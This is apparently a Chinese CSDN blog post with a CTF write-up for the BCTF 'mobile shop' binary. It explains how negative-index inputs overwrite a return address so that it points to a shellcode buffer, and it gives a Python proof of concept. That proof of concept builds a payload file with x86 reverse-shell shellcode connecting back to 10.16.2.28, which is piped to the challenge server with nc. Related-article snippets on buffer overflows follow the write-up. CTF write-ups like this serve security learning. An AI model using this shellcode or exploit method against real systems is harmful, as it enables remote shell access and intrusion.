linux-写入溢出

最新推荐文章于 2023-01-05 21:07:28 发布
最新推荐文章于 2023-01-05 21:07:28 发布
阅读量545 收藏
点赞数
分类专栏: LINUX 学习 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zcc1414/article/details/24487505
版权

身无分文: 200

描述

米特尼克在BAT上班时,发现很多同事都在用新款Android手机,很是羡慕,他也想搞一部,来替换他那部用了“二十多年”的摩托罗拉手机。但是他在BAT公司还没拿到第一笔工资,用假身份申请的信用卡在租房与日常饮食上也快刷爆了,可以说是身无分文了。这却难不倒米特尼克,他发现了这个销售手机的在线商店。商店地址:218.2.197.251:1234 http://bctf.cn/files/downloads/mobile_shop_4d904f700ef95bae39936cd9c0829d31


程序界面:


做这种题可以先将 函数流程理出来就好做了

int __cdecl sub_8048C00()  主功能函数{

sub_8048840((int)&v4); 漏洞函数  -》

signed int __cdecl sub_8048A30(int a1)(

函数中明显有一个 sub_80486F0((int)&unk_804B1E0, 200, 10 明显200字节是装载shellcode的)


}



int __cdecl sub_8048C00()
{
  char *v0; // eax@1
  signed int v1; // eax@4
  int result; // eax@10
  char v3; // [sp+13h] [bp-19h]@2
  char arr; // [sp+14h] [bp-18h]@14
  char v5; // [sp+1Bh] [bp-11h]@1
  int v6; // [sp+1Ch] [bp-10h]@1

可以看到主函数 sub_8048C00   的返回地址肯定比  arr字符串的地址高,所以可以修改返回地址

可以发现漏洞点:



sub_8048C00   主功能函数
返回地址  :0804859e

修改为      0804B1E0
输入 " -17"可以85 ++  (0xb1-0x85)次
输入 " -16"可以9e ++  (0xe0-0x9e)次


EDB看到:



GDB可以看到:




最后

nc 218.2.197.251:1234 1234 < payload.txt 即可获得shell

POC:

shellcode = (  
#define IPADDR '\x0a\x10\x02\x1c'  10.16.2.28
#define PORT '\x7a\x69'
'\x31\xc0\x31\xdb\x31\xc9\x31\xd2'
'\xb0\x66\xb3\x01\x51\x6a\x06\x6a'
'\x01\x6a\x02\x89\xe1\xcd\x80\x89'
'\xc6\xb0\x66\x31\xdb\xb3\x02\x68'
#IPADDR
'\x0a\x10\x02\x1c'
'\x66\x68'
#PORT
'\x7a\x69'
'\x66\x53\xfe'
'\xc3\x89\xe1\x6a\x10\x51\x56\x89'
'\xe1\xcd\x80\x31\xc9\xb1\x03\xfe'
'\xc9\xb0\x3f\xcd\x80\x75\xf8\x31'
'\xc0\x52\x68\x6e\x2f\x73\x68\x68'
'\x2f\x2f\x62\x69\x89\xe3\x52\x53'
'\x89\xe1\x52\x89\xe2\xb0\x0b\xcd'
'\x80\x90'
)

data = ''
data += 'a\n -16\n'*(0xe0-0x9e)
data += 'a\n -17\n'*(0xb1-0x85)
data += 'a\n1\n'
data += 'c\ny\n'
data += 'name\n'
data += shellcode+'\n'
data += 'd\n'
open('payload.txt','w').write(data)

import binascii
print repr(binascii.hexlify(data))






pandamac
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
写入到a时缓冲区溢出_一文理解缓冲区溢出
weixin_42440934的博客
01-26 5720
1 引言“缓冲区溢出”对现代操作系统与编译器来讲已经不是什么大问题,但是作为一个合格的 C/C++ 程序员,还是完全有必要了解它的整个细节。计算机程序一般都会使用到一些内存,这些内存或是程序内部使用,或是存放用户的输入数据,这样的内存一般称作缓冲区。简单的说,缓冲区就是一块连续的计算机内存区域,它可以保存相同数据类型的多个实例,如字符数组。而缓冲区溢出则是指当计算机向缓冲区内填充数据位数时超过了缓...
缓冲区溢出
penglaozi的专栏
11-13 3881
一、内存攻防技术 1. 缓冲区溢出 缓冲区溢出漏洞是程序由于缺乏对缓冲区边界条件检查而引起的一种异常行为,通常是程序向缓冲区中写数据,但内容超过了程序员设定的缓冲区边界,从而覆盖了相邻的内存区域,造成覆盖程序中的其他变量甚至影响控制流的敏感数据,造成程序的非预期行为。 eg: 如图所示,在内存中保存了相邻的两个变量,A是char[]字符串类型,作为缓冲区用于
[C++] 写入到“newSpace”时缓冲区溢出: 可写大小为“newSize*4”个字节,但可能写入了“8”个字节。
qq_44747572的博客
09-18 6415
[写入到“newSpace”时缓冲区溢出: 可写大小为“newSize4”个字节,但可能写入了“8”个字节。] 警告消除 解决方法:newSize后面加4 //添加 //计算添加新空间的大小 int newSize = this->m_EmpNum + addNum; //新空间人数 = 原来记录人数 + 新增人数 //开辟新空间 Worker ** newSpace = new Worker * [newSize+4]; //解决内存溢出问题 newSize+4
C/C++写入到““时缓冲区溢出:可写大小为““个字节,但可能写入了“8“个字节。
weixin_44343938的博客
01-05 1634
存放到tmp中,那么就需要开辟sizeof(arr1)+sizeof(arr2)+4个字节,只要使用了循环,就算只在arr1、arr2中拷贝一个元素,也需要开辟整个数组的空间,有几个数组参与了循环就要开辟几个数组的sizeof的空间 ---- 编译器不知道你到底要拷贝这些数组中的多少元素,只能做最坏的打算认为你是要把这些数组的所有元素都拷贝进来,而且你可能对循环进行更改导致在数组尚未越界的时候tmp就已经放不下了。此警告的目的是提示我们要在所需的最小空间的基础上加上足够的空间,防止溢出
VS2019: C6386 警告的解决方案(写入到“nWord“时缓冲区溢出:可写大小为“nTotal*4“个字节,但可能写入了“8“个字节)
热门推荐
ArcherAYQ的博客
08-08 2万+
使用了求助者的代码作为例子,编译器提示C6386警告 #include<iostream> using namespace std; unsigned int nNumItems = 0; int main() { int* nWords = nullptr; unsigned int nTotal; nTotal = 3 + 2 * nNumItems; nWords = new int[nTotal]; nWords[0] = 1;
二进制漏洞挖掘-栈溢出-开启Canary1
08-04
二进制漏洞挖掘-栈溢出-开启Canary 本文将详细介绍二进制漏洞挖掘-栈溢出-开启Canary的相关知识点。 栈溢出漏洞 栈溢出漏洞是一种常见的二进制漏洞,发生在程序对栈缓冲区进行写操作时,未对缓冲区大小进行判断,...
二进制漏洞挖掘-栈溢出-开启FORTIFY1
08-04
二进制漏洞挖掘-栈溢出-开启FORTIFY1 二进制漏洞挖掘是指在二进制文件中寻找并利用漏洞来达到攻击目的。在这里,我们将重点讨论栈溢出漏洞,并且展示如何使用FORTIFY来防止这种漏洞。 栈溢出漏洞是指在栈缓冲区中...
二进制漏洞挖掘-栈溢出-开启RELRO1
08-04
溢出是其中最常见的漏洞类型之一,它发生在程序的栈空间上,当程序向栈分配的缓冲区写入的数据超过其实际大小时发生。这种情况可能导致数据的破坏,更严重的是,可以被攻击者利用来篡改程序执行流程。 栈溢出漏洞...
linux-MMU.rar_LINUX ??MMU_mmu
09-22
5. **交换与页面替换**:当物理内存不足时,Linux会使用交换机制,将不活跃的页写入磁盘上的交换空间,以便腾出物理内存给活跃的进程使用。这涉及到页面替换算法,如LRU(最近最少使用)或OOM(Out of Memory)杀手...
基于Linux的栈溢出攻击防护系统.pdf
09-07
溢出攻击是指攻击者通过向栈中写入恶意代码,导致程序崩溃或执行恶意指令的一种攻击方式。栈溢出攻击可以导致严重的安全问题,如远程访问、数据泄露、系统崩溃等。根据CERT/CC的数据,栈溢出攻击占了所有攻击方式...
修复缓冲区溢出问题
05-15 1328
<!-- alimama_pid="mm_10249644_1605763_4929893"; alimama_titlecolor="707070"; alimama_descolor ="CCCCCC"; alimama_bgcolor="FFFFFF"; alimama_bordercolor="FFFFFF"; alimama_linkcolor="DADA
Linux进程间通信—消息队列
weixin_33824363的博客
11-17 97
四.消息队列(Message Queue) 消息队列就是消息的一个链表,它允许一个或者多个进程向它写消息,一个或多个进程向它读消息。Linux维护了一个消息队列向量表:msgque,来表示系统中所有的消息队列消息队列克服了信号传递信息少,管道只能支持无格式字节流和缓冲区受限的缺点。 消息队列用于运行于同一台机器上的进程间通信,它和管道很相似,是一个在系统内核中用来保存消息的队列,它在系统...
查看linux服务器硬盘IO读写负载
karl_han的专栏
08-20 2188
<br />最近一台linux服务器 出现异常,系统反映很慢,相应的应用程序也无法反映,而且还出现死机的情况,经过几天的观察了解,发现服务器 压力很大,主要的压力来自硬盘的IO访问已经达到100% <br />  为了方便各位和自己今后遇到此类问题能尽快解决,我这里将查看linux 服务器硬盘IO访问负荷的方法同大家一起分享:<br />  首先 、用top命令查看<br />  top - 16:15:05 up 6 days,  6:25,  2 users,  load average: 1.
.xb文件 mysql备份恢复
球球的博客
05-23 1524
恢复数据 软件准备:要安装两个软件 (1) Percona Xtrabackup (2) qpress 1. Percona Xtrabackup 安装步骤 [root@node3 ~]# wget https://downloads.percona.com/downloads/Percona-XtraBackup-2.4/Percona-XtraBackup-2.4.23/binary/redhat/7/x86_64/Percona-XtraBackup-2.4.23-r3320f39-el7-x86_6
linux 64位 栈溢出
最新发布
08-19
Linux 64位系统中,栈溢出是一种常见的安全漏洞。栈溢出是指当程序写入超过栈分配的缓冲区的数据时,会覆盖到栈上的其他数据,从而导致程序的异常行为。这个漏洞可以被恶意攻击者利用,执行任意的代码或者获取敏感数据。 在64位系统中,栈溢出的原理和32位系统类似,但是由于64位系统的栈和寄存器的大小不同,所以在实际操作上会有所不同。一种常见的攻击方法是通过溢出覆盖返回地址,将程序的控制流引导到恶意代码执行的地址上。为了实现栈溢出攻击,攻击者需要了解目标程序的内存布局和对应的函数调用机制。 引用提到了关于Linux下64位缓冲区溢出的文章,对于想深入了解64位系统下的栈溢出攻击的人来说,这篇文章可能是一个很好的参考。引用提供了一个关于shellcode的示例,可以用来在64位系统中执行系统命令。而引用则指出本文的目的是让读者学习64位缓冲区溢出的基础知识。 总的来说,在Linux 64位系统中,栈溢出是一种常见的安全漏洞,攻击者可以通过溢出覆盖返回地址来执行恶意代码。为了进行栈溢出攻击,攻击者需要了解目标程序的内存布局和函数调用机制。可以参考引用中的文章来深入了解64位系统下的栈溢出攻击的细节。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [linux64 溢出,64位Linux下的栈溢出](https://blog.csdn.net/weixin_36383252/article/details/116872723)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [linux溢出](https://blog.csdn.net/qq_45323960/article/details/122766130)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值